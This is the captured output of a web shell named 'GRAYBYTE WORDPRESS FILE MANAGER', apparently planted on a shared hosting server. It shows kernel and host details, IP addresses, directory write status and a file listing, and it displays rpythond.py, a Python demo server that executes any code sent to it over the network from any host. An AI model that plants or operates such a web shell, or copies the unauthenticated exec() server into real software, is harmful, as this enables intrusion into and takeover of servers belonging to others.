✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ beluga.o2switch.net ​🇻​♯➤ 4.18.0-553.123.2.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2026

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 185.154.139.77 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.84
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /opt/alt/python34/lib64/python3.4/Tools/demo//rpythond.py
#! /opt/alt/python34/bin/python3.4

"""
Remote python server.
Execute Python commands remotely and send output back.

WARNING: This version has a gaping security hole -- it accepts requests
from any host on the Internet!
"""

import sys
from socket import socket, AF_INET, SOCK_STREAM
import io
import traceback

PORT = 4127
BUFSIZE = 1024

def main():
    if len(sys.argv) > 1:
        port = int(sys.argv[1])
    else:
        port = PORT
    s = socket(AF_INET, SOCK_STREAM)
    s.bind(('', port))
    s.listen(1)
    while True:
        conn, (remotehost, remoteport) = s.accept()
        print('connection from', remotehost, remoteport)
        request = b''
        while 1:
            data = conn.recv(BUFSIZE)
            if not data:
                break
            request += data
        reply = execute(request.decode())
        conn.send(reply.encode())
        conn.close()

def execute(request):
    stdout = sys.stdout
    stderr = sys.stderr
    sys.stdout = sys.stderr = fakefile = io.StringIO()
    try:
        try:
            exec(request, {}, {})
        except:
            print()
            traceback.print_exc(100)
    finally:
        sys.stderr = stderr
        sys.stdout = stdout
    return fakefile.getvalue()

try:
    main()
except KeyboardInterrupt:
    pass


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
25 Jul 2024 8.41 AM
root / linksafe
0755
__pycache__
--
25 Jul 2024 8.41 AM
root / linksafe
0755
README
0.99 KB
18 Mar 2019 4.51 PM
root / linksafe
0644
beer.py
0.564 KB
17 Apr 2024 5.09 PM
root / linksafe
0755
eiffel.py
3.826 KB
17 Apr 2024 5.09 PM
root / linksafe
0755
hanoi.py
4.505 KB
17 Apr 2024 5.09 PM
root / linksafe
0755
life.py
8.788 KB
17 Apr 2024 5.09 PM
root / linksafe
0755
markov.py
3.61 KB
17 Apr 2024 5.09 PM
root / linksafe
0755
mcast.py
2.183 KB
17 Apr 2024 5.09 PM
root / linksafe
0755
queens.py
2.229 KB
17 Apr 2024 5.09 PM
root / linksafe
0755
redemo.py
5.671 KB
17 Apr 2024 5.09 PM
root / linksafe
0755
rpython.py
0.771 KB
17 Apr 2024 5.09 PM
root / linksafe
0755
rpythond.py
1.268 KB
17 Apr 2024 5.09 PM
root / linksafe
0755
sortvisu.py
19.524 KB
17 Apr 2024 5.09 PM
root / linksafe
0755
ss1.py
24.939 KB
17 Apr 2024 5.09 PM
root / linksafe
0755
vector.py
1.43 KB
17 Apr 2024 5.09 PM
root / linksafe
0755

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF